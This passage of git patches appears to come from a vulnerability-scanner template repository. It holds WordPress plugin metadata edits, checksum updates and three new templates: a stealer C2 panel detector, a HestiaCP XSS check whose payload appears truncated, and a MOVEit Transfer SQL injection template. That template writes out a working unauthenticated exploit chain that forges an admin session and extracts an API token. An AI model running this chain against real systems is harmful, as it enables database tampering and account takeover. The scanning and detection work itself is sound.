b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From f990c0a1e72656e5cf508c1493f7a6ea93861453 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 9 Jul 2023 13:29:55 +0530 Subject: [PATCH 543/609] Create rhadamanthys-stealer-panel.yaml --- .../c2/rhadamanthys-stealer-panel.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml diff --git a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml new file mode 100644 index 0000000000..4523491635 --- /dev/null +++ b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml @@ -0,0 +1,29 @@ +id: rhadamanthys-stealer-panel + +info: + name: Rhadamanthys Stealer C2 Panel - Detect + author: ritikchaddha + severity: info + reference: + - https://twitter.com/0xperator/status/1677873700610162690 + - https://github.com/alex14324/Rhadamanthys-Stealer + metadata: + verified: true + tags: c2,rhadamanthys,stealer,panel + +http: + - method: GET + path: + - "{{BaseURL}}/admin/console/index.html" + + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Rhadamanthys Admin" + + - type: status + status: + - 200 From 6dc7cbafe6e84135f0efffe4f4a16ba644f16b52 Mon Sep 17 00:00:00 2001 From: edoardottt Date: Sun, 9 Jul 2023 11:02:02 +0200 Subject: [PATCH 544/609] add CVE-2023-3479 --- http/cves/2023/CVE-2023-3479.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/cves/2023/CVE-2023-3479.yaml diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml new file mode 100644 index 0000000000..9b4ba51f94 --- /dev/null +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -0,0 +1,31 @@ +id: CVE-2023-3479 + +info: + name: hestiacp/hestiacp prior to 1.7.8 - Cross-Site Scripting + author: edoardottt + severity: medium + description: | + Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8. + reference: + - https://huntr.dev/bounties/6ac5cf87-6350-4645-8930-8f2876427723/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-3479 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3479 + cwe-id: CWE-79 + tags: cve,cve2023,hestiacp,xss + +http: + - method: GET + path: + - '{{BaseURL}}/templates/pages/debug_panel.php?id=xss">' + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "")' + - 'contains(body, "Hestia Control Panel")' + condition: and From 616e1ec5b0110ec085ce2a07c3865b3d2d67b426 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sun, 9 Jul 2023 15:17:35 +0530 Subject: [PATCH 545/609] Added CVE-2023-36934 (MOVEit Transfer - SQL Injection) (#7650) --- http/cves/2023/CVE-2023-36934.yaml | 95 ++++++++++++++++++++++++++++++ 1 file changed, 95 insertions(+) create mode 100644 http/cves/2023/CVE-2023-36934.yaml diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml new file mode 100644 index 0000000000..c1f475dbfc --- /dev/null +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -0,0 +1,95 @@ +id: CVE-2023-36934 + +info: + name: MOVEit Transfer - SQL Injection + author: rootxharsh,iamnoooob,pdresearch + severity: critical + description: | + In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content. + reference: + - https://community.progress.com/s/article/MOVEit-Transfer-2020-1-Service-Pack-July-2023 + - https://blog.projectdiscovery.io/moveit-transfer-sql-injection/ + - https://thehackernews.com/2023/07/another-critical-unauthenticated-sqli.html + classification: + cve-id: CVE-2023-36934 + epss-score: 0.00047 + cwe-id: CWE-89 + cpe: cpe:2.3:a:progess:moveit_transfer:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + shodan-query: http.favicon.hash:989289239 + verified: true + product: moveit_transfer + vendor: progess + tags: cve,cve2023,moveit,rce,sqli,intrusive +variables: + session_cookie: "{{randstr}}" + +http: + - raw: + - | + POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%27{{session_cookie}}%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+IpAddress=%27{{public_ip()}}%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%27{{session_cookie}}%27%23 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + transaction=signon + - | + POST /human.aspx?ep={{url_encode(ep)}} HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: InitialPage=zzzz.aspx; + + transaction=passchangerequest + - | + POST /machine.aspx HTTP/2 + Host: {{Hostname}} + Cookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}}; + + a=a + - | + POST /api/v1/auth/token HTTP/1.1 + Host: {{Hostname}} + User-Agent: python-requests/2.26.0 + Accept-Encoding: gzip, deflate + Cookie: ASP.NET_SessionId={{session_cookie}} + Content-Type: application/x-www-form-urlencoded + + grant_type=session&username=x&password=x + + extractors: + - type: regex + name: ep + group: 1 + part: body_1 + regex: + - '\bep=([^&]+)"' + internal: true + + - type: regex + name: session + part: header_2 + group: 1 + regex: + - 'ASP.NET_SessionId=([^;]+)' + internal: true + + - type: regex + group: 1 + part: body_4 + regex: + - '"access_token":"([^"]+)"' + + matchers-condition: and + matchers: + - type: word + part: body_4 + words: + - '"refresh_token"' + - '"access_token"' + - '"token_type"' + - '"expires_in"' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 7596f25dcc2f7350c470b5207f8a9ca156fb61c5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jul 2023 09:47:51 +0000 Subject: [PATCH 546/609] Auto Generated New Template Addition List [Sun Jul 9 09:47:51 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8ba664e8f6..744c179594 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ http/cves/2022/CVE-2022-46073.yaml +http/cves/2023/CVE-2023-36934.yaml http/exposed-panels/sunbird-dcim-panel.yaml From 2269db63dd3bfc87b4aa990a76fb2a1915c28aa8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jul 2023 09:47:55 +0000 Subject: [PATCH 547/609] Auto Generated cves.json [Sun Jul 9 09:47:55 UTC 2023] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 136e232f8b..ffe16aecdf 100644 --- a/cves.json +++ b/cves.json @@ -1915,3 +1915,4 @@ {"ID":"CVE-2023-36287","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36287.yaml"} {"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"} {"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross-site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"} +{"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index bc3de27f0f..a4b4e62a9b 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -4512d959add95e8cc8d761ec316e3dac +62637697ea3959413498353a713eae14 From 5f45b099b3ee642b75ae4c92f3e8f0bd2577deaf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jul 2023 09:48:07 +0000 Subject: [PATCH 548/609] Auto Generated Templates Checksum [Sun Jul 9 09:48:07 UTC 2023] :robot: --- templates-checksum.txt | 413 +++++++++++++++++++++-------------------- 1 file changed, 207 insertions(+), 206 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4e2a10533d..731bd6f940 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:e268bd37316310244916d616fd87c09b09033472 TEMPLATES-STATS.md:97fbc54da963e2a9d0b1aedd747203808e78dddb TOP-10.md:d23a36ee425b3324a3837f19b9ed7971a950c597 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:84b562fb5aaa54405334753d9224c53d4d0745d9 -cves.json-checksum.txt:73b1d3e2dab71403691dc766cbf795cfd0a12ecb +cves.json:513aa6b44cb33f11853ae1a4ab614462dc4464a5 +cves.json-checksum.txt:ef837420c6bf1801c70070d362ced53a45fb7b4e dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/cname-fingerprint.yaml:f7200ff1f3b3f96a7a92ddd6b49e5e5abe1d2377 @@ -298,7 +298,7 @@ helpers/wordpress/plugins/mailchimp-for-wp.txt:3117538b6909fe203f45b8cdf89723893 helpers/wordpress/plugins/mailpoet.txt:6656707caddf0e344bba71919a3a123944b8ccd9 helpers/wordpress/plugins/maintenance.txt:254b136ca21ea7ce53096fd367ddb29c22a7cce9 helpers/wordpress/plugins/mainwp-child.txt:980feb4697a9a59378889074eb2a9c667eb85231 -helpers/wordpress/plugins/malcare-security.txt:8a354e6fda90148b0c22992b849e693b1ed6749f +helpers/wordpress/plugins/malcare-security.txt:d4d296df9c7bfc07d0bc5adb18ee49bef62495cd helpers/wordpress/plugins/megamenu.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 helpers/wordpress/plugins/members.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/meta-box.txt:8a4874fdff1ab036389b4739f479332aa0c63551 @@ -391,7 +391,7 @@ helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 helpers/wordpress/plugins/wp-smushit.txt:2ddc3af40d4f8085d3ff3021fcd45eca158663e3 -helpers/wordpress/plugins/wp-statistics.txt:2e82474b0edd5bf8921bf46965dbc65a7cbfd3b0 +helpers/wordpress/plugins/wp-statistics.txt:782ddb65e05f375b535cdffb2b6cc38632460184 helpers/wordpress/plugins/wp-super-cache.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-user-avatar.txt:06a4c8fb3498a24c86d06fd73d56763fee83924e helpers/wordpress/plugins/wpcf7-recaptcha.txt:e864410c570d87244a122a31198944fa5ab9260e @@ -2238,7 +2238,7 @@ http/cves/2022/CVE-2022-45835.yaml:5f4b590f00df7eff3055f62f3f7808905fec9129 http/cves/2022/CVE-2022-45917.yaml:0226b686f5fd79959cafe8ae966fd89d5a2dbce6 http/cves/2022/CVE-2022-45933.yaml:5e00a22a676d7eda5a57443146b560b0608a1975 http/cves/2022/CVE-2022-46020.yaml:ba3769558e37986e70e73ddd1577bdb353915229 -http/cves/2022/CVE-2022-46073.yaml:798bd5ab3d74675317798df7ca11834f20cbf3e3 +http/cves/2022/CVE-2022-46073.yaml:f80767fd442397daf63272de14f15bfdb8b0d4b3 http/cves/2022/CVE-2022-46169.yaml:562e09c425a29df8e43ffcb45dfcf005dd7c6767 http/cves/2022/CVE-2022-46381.yaml:ce9bf2978927607fd30ccf68be73583dfa5ea4c8 http/cves/2022/CVE-2022-46888.yaml:dd73682972669a956f087dfa462eb81947d562c2 @@ -2362,6 +2362,7 @@ http/cves/2023/CVE-2023-35844.yaml:6d63343cd1d397fc2169be8459ea294c22008817 http/cves/2023/CVE-2023-36287.yaml:5eb1daacf8748242791657809bb6e463b71a48f6 http/cves/2023/CVE-2023-36289.yaml:71857d7c8d924ea71d0cea573f83c4879f951555 http/cves/2023/CVE-2023-36346.yaml:9ee6abfd347367ffb335b101ce3c283a34d6ec3c +http/cves/2023/CVE-2023-36934.yaml:1c78c1cd52976f7792301274210509404f1f715a http/default-logins/3com/3com-nj2000-default-login.yaml:c00b706cfbbb60a4377ed00240d60f1b4679f18d http/default-logins/UCMDB/ucmdb-default-login.yaml:65a8ff54c063a35e251409ed8bfd1a93e50d42c2 http/default-logins/abb/cs141-default-login.yaml:8914cccfee6dfcbfbb632cf088ca7a33823561d6 @@ -5413,214 +5414,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 -http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 